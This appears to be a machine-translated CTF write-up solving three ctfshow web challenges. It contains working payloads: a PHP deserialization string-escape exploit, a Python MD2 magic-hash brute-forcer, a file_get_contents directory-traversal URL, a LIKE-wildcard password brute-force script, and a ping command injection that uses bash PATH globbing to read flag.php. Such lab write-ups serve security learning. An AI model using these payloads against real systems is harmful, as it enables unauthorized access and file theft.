web1_this night round
<?php
error_reporting(0);
class a
{
public $uname;
public $password;
public function __construct($uname,$password)
{
$this->uname=$uname;
$this->password=$password;
}
public function __wakeup()
{
if($this->password==='yu22x')
{
include('flag.php');
echo $flag;
}
else
{
echo 'wrong password';
}
}
}
function filter($string){
return str_replace('Firebasky','Firebaskyup',$string);
}
$uname=$_GET[1];
$password=1;
$ser=filter(serialize(new a($uname,$password)));
$test=unserialize($ser);
?>
More obvious PHP deserialization length attacks, such as:
O:1:"a":2:{
s:5:"uname";s:5:"12345";s:8:"password";i:1;}
What if:
O:1:"a":2:{
s:5:"uname";s:5:"12345";s:8:"password";i:123;}";s:8:"password";i:1;}
Just to give an example, it means that through some replacement custom functions, the value in uname has become longer, but the length after serialization has not changed, here is still 5, so what we get is 12345, and then password It is 123, the last one ";s:8:"password";i:1;}is equivalent to being cut off
In this question, Firebasky will be replaced with Firebaskyup, adding 2 digits at a time. And what we want to construct is roughly like this:
O:1:"a":2:{
s:5:"uname";s:4:"feng";s:8:"password";s:5:"yu22x";}
We need to fake these:
";s:8:"password";s:5:"yu22x";}
The length is 30, so uname needs 15 Firebaskys, and the final structure is as follows:
<?php
class a
{
public $uname='FirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebasky";s:8:"password";s:5:"yu22x";}';
//public $uname="feng";
public $password="yu22x";
}
function filter($string){
return str_replace('Firebasky','Firebaskyup',$string);
}
echo filter(serialize(new a()));
web2_ old man's heart
<?php
error_reporting(0);
highlight_file(__FILE__);
$a=$_GET['a'];
$b=$_GET['b'];
$c=$_GET['c'];
$url[1]=$_POST['url'];
if(is_numeric($a) and strlen($a)<7 and $a!=0 and $a**2==0){
$d = ($b==hash("md2", $b)) && ($c==hash("md2",hash("md2", $c)));
if($d){
highlight_file('hint.php');
if(filter_var($url[1],FILTER_VALIDATE_URL)){
$host=parse_url($url[1]);
print_r($host);
if(preg_match('/ctfshow\.com$/',$host['host'])){
print_r(file_get_contents($url[1]));
}else{
echo '差点点就成功了!';
}
}else{
echo 'please give me url!!!';
}
}else{
echo '想一想md5碰撞原理吧?!';
}
}else{
echo '第一个都过不了还想要flag呀?!';
}
A simple challenge, except for the md2 in the middle that puffed me up. . .
The first is this:
if(is_numeric($a) and strlen($a)<7 and $a!=0 and $a**2==0){
Investigate the accuracy of floating-point numbers overflow, just arbitrary construction. It is to keep testing, such as constructing first 9e-100, and discovering that $a!=0成立但是$a**2==0不成立, to put it bluntly, it is to use floating point numbers so that it is not as small as 0, but it can be as small as close to 0 after it is squared.
Slowly testing 9e-180can be satisfied.
Then there is the evil MD2:
$d = ($b==hash("md2", $b)) && ($c==hash("md2",hash("md2", $c)));
The problem with this question is robots.txt. Normally, there is no need to scan the catalog for such a problem, but I did not expect it to be done. . . You can finally get this hint:
Is it particularly difficult to break MD2?!
I’ll tell you quietly that I saw the payoad of the author.
But the numbers are not clear.have fun~~~~
xxxxx024452 hash(“md2”,$b)
xxxxxx48399 hash(“md2”,hash(“md2”,$b))
The last few digits of the structure of b and c are given, and the first two digits must be 0e. According to the prompt numbers, just press pure numbers to explode, and write a python script to explode:
from Crypto.Hash import MD2
for v1 in "0123456789":
for v2 in "0123456789":
for v3 in "0123456789":
v = "0e" + v1 + v2 + v3 + "024452"
obj = MD2.new()
obj.update(v.encode("utf-8"))
n1 = obj.hexdigest()
if n1[0:2] == "0e" and n1[2:11].isdigit():
print("第一个是:"+v)
for v1 in "0123456789":
for v2 in "0123456789":
for v3 in "0123456789":
for v4 in "0123456789":
v = "0e" + v1 + v2 + v3 + v4 + "48399"
obj = MD2.new()
obj.update(v.encode("utf-8"))
n1 = obj.hexdigest()
obj = MD2.new()
obj.update(n1.encode("utf-8"))
n2 = obj.hexdigest()
if n2[0:2] == "0e" and n2[2:11].isdigit():
print("第二个是:"+v)
The Crypto library where python is installed has many metaphysical problems. I had forgotten those solutions when I wrote the blog. . I hope that latecomers will ask for their own blessings. . . I think the most difficult part of this question is not the knowledge, but the installation of the Crypto library. . .
The last is this:
highlight_file('hint.php');
if(filter_var($url[1],FILTER_VALIDATE_URL)){
$host=parse_url($url[1]);
print_r($host);
if(preg_match('/ctfshow\.com$/',$host['host'])){
print_r(file_get_contents($url[1]));
}else{
echo '差点点就成功了!';
}
}else{
echo 'please give me url!!!';
}
It has been suggested that the flag is in fl0g.txt, so it must be read by file_get_contents.
Here is a small trick of the file_get_contents function:
When PHP's file_get_contents() function encounters an unknown pseudo-protocol header, it will use the pseudo-protocol header as a folder, causing directory traversal loopholes. At this time, you only need to jump up the directory to read the file in the root directory.
So construct an unknown protocol header, and then the directory can be traversed:
url=httpp://ctfshow.com/../../../../../../../../fl0g.txt
web3_Mo negative Chanjuan
After finishing the revenge of the mooncake cup web3, which is the introduction of WEB, the field of vision is really broadened when it comes to this topic.
The first to enter the environment is to log in, f12 saw important information:
<!--注意:正式上线请删除注释内容! -->
<!-- username yu22x -->
<!-- SELECT * FROM users where username like binary('$username') and password like binary('$password')-->
Seeing that it was like, I thought it needed to be injected. I ran a fuzz and felt that all the injection needed was given to ban, but the wildcards% and _ of like are only banned. I thought I could log in successfully if I could select the result, and then kept adding _Match, only 32 matches are found, but this is returned:
I have filtered all the characters. Why can you come in? get out!
Explain that the password can be injected into Boolean to run out, write a python:
import requests
url="http://e311aa89-4b46-4cdb-bf83-cfdb0504d0a3.chall.ctf.show/login.php"
password=""
length=32
result="67815b0c009ee970fe4014abaa3Fa6A0"
for i in range(0,33):
for j in "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ":
payload=password+j+"_"*(31 - len(password))
data={
"username":"yu22x",
"password":payload
}
r=requests.post(url=url,data=data).text
if "wrong" not in r:
password+=j
print(password)
break
After the login is successful, go to /P1099.php, the more obvious command execution, the front is ping, use; to separate the commands, and then find a way to execute the second command constructed by yourself.
Because I have done a lot of enhanced versions of this question, banned various things, and learned a variety of postures, so the second question with almost no filtering is very easy. It is to filter lowercase letters and some symbols. This question is constructed using bash's built-in variables. Because there is no ban for numbers, it is easier to construct. Put the following payload in /bin/base64 flag.php:
ip=127.0.0.1;${
PATH::1}???${
PATH::1}????64 ????.???
Construct out/suffice it. More postures can be learned after brushing web3's revenge series. Hehehe.